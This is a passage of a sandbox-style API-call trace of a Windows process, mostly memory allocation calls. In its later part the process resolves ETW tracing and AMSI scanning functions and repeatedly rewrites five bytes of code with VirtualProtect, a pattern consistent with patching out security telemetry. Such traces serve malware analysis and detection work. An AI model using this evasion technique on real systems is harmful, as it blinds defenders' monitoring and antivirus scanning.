dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.522] VirtualFree (lpAddress=0x4bdc000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.523] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.525] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.526] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.529] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.529] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.530] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.531] VirtualFree (lpAddress=0x4bdc000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.532] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.532] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.533] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.534] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.535] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.536] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.537] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.538] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.539] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.540] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.541] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.542] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.543] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.544] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.545] VirtualFree (lpAddress=0x4bdc000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.545] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.546] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.547] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.548] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.549] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.551] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.551] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.553] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.553] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.554] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.554] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.555] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.556] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.557] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.558] VirtualFree (lpAddress=0x4bdc000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.558] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.559] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.561] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.561] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.562] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.563] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.569] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.571] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.571] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.572] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.573] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.573] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.574] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.575] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.576] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.577] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.577] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.579] VirtualFree (lpAddress=0x4be4000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.579] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.580] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.581] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.583] VirtualAlloc (lpAddress=0x4be8000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.584] VirtualFree (lpAddress=0x4bdc000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.585] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.586] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.587] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.587] VirtualAlloc (lpAddress=0x4be8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.588] VirtualFree (lpAddress=0x4be0000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.590] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.591] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.591] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.593] VirtualFree (lpAddress=0x4be8000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.594] VirtualFree (lpAddress=0x4bf0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.594] VirtualAlloc (lpAddress=0x4be4000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be4000 [0125.595] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.597] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.597] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.597] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.599] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.600] VirtualFree (lpAddress=0x4bec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.600] VirtualAlloc (lpAddress=0x4be8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be8000 [0125.601] VirtualFree (lpAddress=0x4be0000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.603] VirtualFree (lpAddress=0x4bd8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.603] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.604] VirtualAlloc (lpAddress=0x4bd8000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bd8000 [0125.605] VirtualFree (lpAddress=0x4be8000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.607] VirtualFree (lpAddress=0x4bf0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.607] VirtualFree (lpAddress=0x4be0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0125.609] VirtualAlloc (lpAddress=0x4be0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be0000 [0125.610] VirtualAlloc (lpAddress=0x4be4000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4be4000 [0125.611] VirtualFree (lpAddress=0x4bd8000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0125.622] VirtualAlloc (lpAddress=0x4bf0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bf0000 [0125.627] VirtualAlloc (lpAddress=0x4bf4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bf4000 [0125.632] VirtualAlloc (lpAddress=0x4bf8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bf8000 [0125.639] VirtualAlloc (lpAddress=0x4bfc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bfc000 [0125.645] VirtualAlloc (lpAddress=0x4c00000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c00000 [0125.650] VirtualAlloc (lpAddress=0x4c04000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c04000 [0125.656] VirtualAlloc (lpAddress=0x4c08000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c08000 [0125.661] VirtualAlloc (lpAddress=0x4c0c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c0c000 [0125.667] VirtualAlloc (lpAddress=0x4c10000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c10000 [0125.672] VirtualAlloc (lpAddress=0x4c14000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c14000 [0125.678] VirtualAlloc (lpAddress=0x4c18000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c18000 [0125.683] VirtualAlloc (lpAddress=0x4c1c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c1c000 [0125.689] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x4c20000 [0125.690] VirtualAlloc (lpAddress=0x4c20000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c20000 [0125.695] VirtualAlloc (lpAddress=0x4c24000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c24000 [0125.701] VirtualAlloc (lpAddress=0x4c28000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c28000 [0125.707] VirtualAlloc (lpAddress=0x4c2c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c2c000 [0125.712] VirtualAlloc (lpAddress=0x4c30000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c30000 [0125.718] VirtualAlloc (lpAddress=0x4c34000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c34000 [0125.723] VirtualAlloc (lpAddress=0x4c38000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c38000 [0125.729] LoadLibraryA (lpLibFileName="System") returned 0x0 [0125.734] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0125.735] GetModuleHandleA (lpModuleName="advapi32") returned 0x76600000 [0125.735] GetProcAddress (hModule=0x76600000, lpProcName="NotifyChangeEventLog") returned 0x76633450 [0125.735] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.736] GetCurrentProcess () returned 0xffffffff [0125.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.736] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.737] FreeLibrary (hLibModule=0x766000ff) returned 0 [0125.737] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0125.737] GetModuleHandleA (lpModuleName="advapi32") returned 0x76600000 [0125.738] GetProcAddress (hModule=0x76600000, lpProcName="SystemFunction035") returned 0x71205db0 [0125.738] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.740] GetCurrentProcess () returned 0xffffffff [0125.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.740] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.740] FreeLibrary (hLibModule=0x766000ff) returned 0 [0125.740] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.741] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.741] GetProcAddress (hModule=0x771d0000, lpProcName="EtwLogTraceEvent") returned 0x77245a10 [0125.741] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.742] GetCurrentProcess () returned 0xffffffff [0125.742] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.742] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.742] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.742] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.743] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.743] GetProcAddress (hModule=0x771d0000, lpProcName="EtwLogTraceEvent") returned 0x77245a10 [0125.743] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.744] GetCurrentProcess () returned 0xffffffff [0125.744] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.744] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.745] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.745] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.745] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.746] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWriteString") returned 0x772b5880 [0125.746] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.747] GetCurrentProcess () returned 0xffffffff [0125.747] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.747] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.747] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.748] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.748] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.749] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWriteFull") returned 0x772b5840 [0125.749] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.750] GetCurrentProcess () returned 0xffffffff [0125.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.750] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.751] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.751] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.751] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.752] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWriteEx") returned 0x771f3290 [0125.752] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.753] GetCurrentProcess () returned 0xffffffff [0125.753] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.753] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.753] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.753] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.754] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.754] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventRegister") returned 0x77218c00 [0125.754] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.755] GetCurrentProcess () returned 0xffffffff [0125.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.755] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.755] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.755] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.756] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.756] GetProcAddress (hModule=0x771d0000, lpProcName="NtOpenFile") returned 0x77246fd0 [0125.756] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.757] GetCurrentProcess () returned 0xffffffff [0125.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.757] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.757] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.757] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.758] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0125.758] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWrite") returned 0x7722ae80 [0125.758] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.759] GetCurrentProcess () returned 0xffffffff [0125.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.759] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.759] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0125.759] FreeLibrary (hLibModule=0x0) returned 0 [0125.759] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.770] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.770] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0125.770] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.771] GetCurrentProcess () returned 0xffffffff [0125.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.771] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.772] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.772] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.772] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.772] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0125.772] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.773] GetCurrentProcess () returned 0xffffffff [0125.773] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.773] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.773] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.774] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.774] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.774] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.774] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.775] GetCurrentProcess () returned 0xffffffff [0125.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.775] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.775] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.775] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.776] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.776] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiUacScan") returned 0x6f874360 [0125.776] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.777] GetCurrentProcess () returned 0xffffffff [0125.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.777] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.777] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.777] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.777] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.778] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.778] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x4) returned 1 [0125.778] GetCurrentProcess () returned 0xffffffff [0125.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.779] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fd7c | out: lpflOldProtect=0x416fd7c*=0x40) returned 1 [0125.779] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.779] VirtualAlloc (lpAddress=0x4c3c000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c3c000 [0125.786] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.786] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.787] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0125.787] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.788] GetCurrentProcess () returned 0xffffffff [0125.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.788] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.788] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.788] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.788] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.788] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0125.789] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.789] GetCurrentProcess () returned 0xffffffff [0125.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.789] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.790] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.790] VirtualAlloc (lpAddress=0x0, dwSize=0x64000, flAllocationType=0x2000, flProtect=0x1) returned 0x4d20000 [0125.790] VirtualAlloc (lpAddress=0x4d20000, dwSize=0x800, flAllocationType=0x1000, flProtect=0x4) returned 0x4d20000 [0125.790] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.791] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.791] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.791] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.792] GetCurrentProcess () returned 0xffffffff [0125.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.792] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.792] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.792] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.793] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.793] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.793] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: 